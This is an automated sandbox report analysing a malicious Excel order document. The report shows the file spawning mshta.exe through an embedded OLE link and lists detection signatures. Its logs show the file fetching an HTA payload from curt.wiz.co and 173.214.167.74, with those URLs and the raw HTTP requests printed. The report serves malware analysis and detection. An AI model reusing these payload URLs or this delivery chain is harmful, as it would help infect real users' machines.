Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order_948575494759.xls

Overview

General Information

Sample name:Order_948575494759.xls
Analysis ID:1577527
MD5:6bcc53dc843155e886f469778b4216f1
SHA1:ca277194f41d84c108389a788d7281e7566ed9f0
SHA256:379fe2ae5a34b2349fe492b4318c589416c5cc8f1e54eb1502455863da17395e
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 7188 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 7720 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 7628 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 8140 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Order_948575494759.xls" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 7188, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns[1].hta
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7188, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 7720, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DesusertionIp: 170.82.174.30, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7188, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49732
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DesusertionIp: 192.168.2.9, DesusertionIsIpv6: false, DesusertionPort: 49732, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7188, Protocol: tcp, SourceIp: 170.82.174.30, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus(YAvira URL Cloud: Label: malware
Source: https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexusAvira URL Cloud: Label: malware
Source: Order_948575494759.xlsReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\~DFEFC13B3210F99F8A.TMPJoe Sandbox ML: detected
Source: Order_948575494759.xlsJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 170.82.174.30:443 -> 192.168.2.9:49732 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: curt.wiz.co
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49732
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49732
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49732
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49732
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49732
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49732
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49732
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49732
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49732
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49732
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.9:49732
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49732 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 173.214.167.74:80 -> 192.168.2.9:49733
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: global trafficTCP traffic: 192.168.2.9:49733 -> 173.214.167.74:80
Source: excel.exeMemory has grown: Private usage: 2MB later: 94MB
Source: Joe Sandbox ViewIP Address: 170.82.174.30 170.82.174.30
Source: Joe Sandbox ViewIP Address: 170.82.174.30 170.82.174.30
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global trafficHTTP traffic detected: GET /f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: curt.wiz.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/dcv/greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownTCP traffic detected without corresponding DNS query: 173.214.167.74
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: curt.wiz.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/dcv/greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 173.214.167.74
Source: global trafficDNS traffic detected: DNS query: curt.wiz.co
Source: Order_948575494759.xls, ~DFEFC13B3210F99F8A.TMP.12.drString found in binary or memory: https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus(Y
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownHTTPS traffic detected: 170.82.174.30:443 -> 192.168.2.9:49732 version: TLS 1.2

System Summary

barindex
Source: Order_948575494759.xlsOLE: Microsoft Excel 2007+
Source: Order_948575494759.xlsOLE: Microsoft Excel 2007+
Source: Order_948575494759.xlsOLE: Microsoft Excel 2007+
Source: Order_948575494759.xlsOLE: Microsoft Excel 2007+
Source: Order_948575494759.xlsOLE: Microsoft Excel 2007+
Source: ~DFEFC13B3210F99F8A.TMP.12.drOLE: Microsoft Excel 2007+
Source: ~DFEFC13B3210F99F8A.TMP.12.drOLE: Microsoft Excel 2007+
Source: ~DFEFC13B3210F99F8A.TMP.12.drOLE: Microsoft Excel 2007+
Source: ~DFEFC13B3210F99F8A.TMP.12.drOLE: Microsoft Excel 2007+
Source: ~DFEFC13B3210F99F8A.TMP.12.drOLE: Microsoft Excel 2007+
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns[1].htaJump to behavior
Source: Order_948575494759.xlsOLE indicator, VBA macros: true
Source: ~DFEFC13B3210F99F8A.TMP.12.drOLE indicator, VBA macros: true
Source: Order_948575494759.xlsStream path 'MBD0191BFBA/\x1Ole' : https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus(Y?{{&4.vTenNz)J^e\a"gwbr+|t:R?B$L;:q2>3vkXx#DD%6rxLf1HH~cO%XRlao}>cK8?y/e(fMrwkIfgZIUaBEn6PyQPnllBBJ935NZJO4LDpizQLCnZkC5OPZ8mzPWE9qwTqVIXYLqSdDQoG897OndRP2duPTd9nHdlpMo3KYOvQtwfmm2vrmB2BaFzIAVpsbX14TeMAcPrMtZ4hJMKTNBB22bF((aG\($"JjP
Source: ~DFEFC13B3210F99F8A.TMP.12.drStream path 'MBD0191BFBA/\x1Ole' : https://curt.wiz.co/f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus(Y?{{&4.vTenNz)J^e\a"gwbr+|t:R?B$L;:q2>3vkXx#DD%6rxLf1HH~cO%XRlao}>cK8?y/e(fMrwkIfgZIUaBEn6PyQPnllBBJ935NZJO4LDpizQLCnZkC5OPZ8mzPWE9qwTqVIXYLqSdDQoG897OndRP2duPTd9nHdlpMo3KYOvQtwfmm2vrmB2BaFzIAVpsbX14TeMAcPrMtZ4hJMKTNBB22bF((aG\($"JjP
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal84.expl.winXLS@6/21@1/2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3E297C04.emfJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{F697A4B5-1D56-4A47-A698-B36C8B333FB4} - OProcSessId.datJump to behavior
Source: Order_948575494759.xlsOLE indicator, Workbook stream: true
Source: ~DFEFC13B3210F99F8A.TMP.12.drOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Order_948575494759.xlsReversingLabs: Detection: 18%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Order_948575494759.xls"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: Order_948575494759.xlsStatic file information: File size 1124352 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: Order_948575494759.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
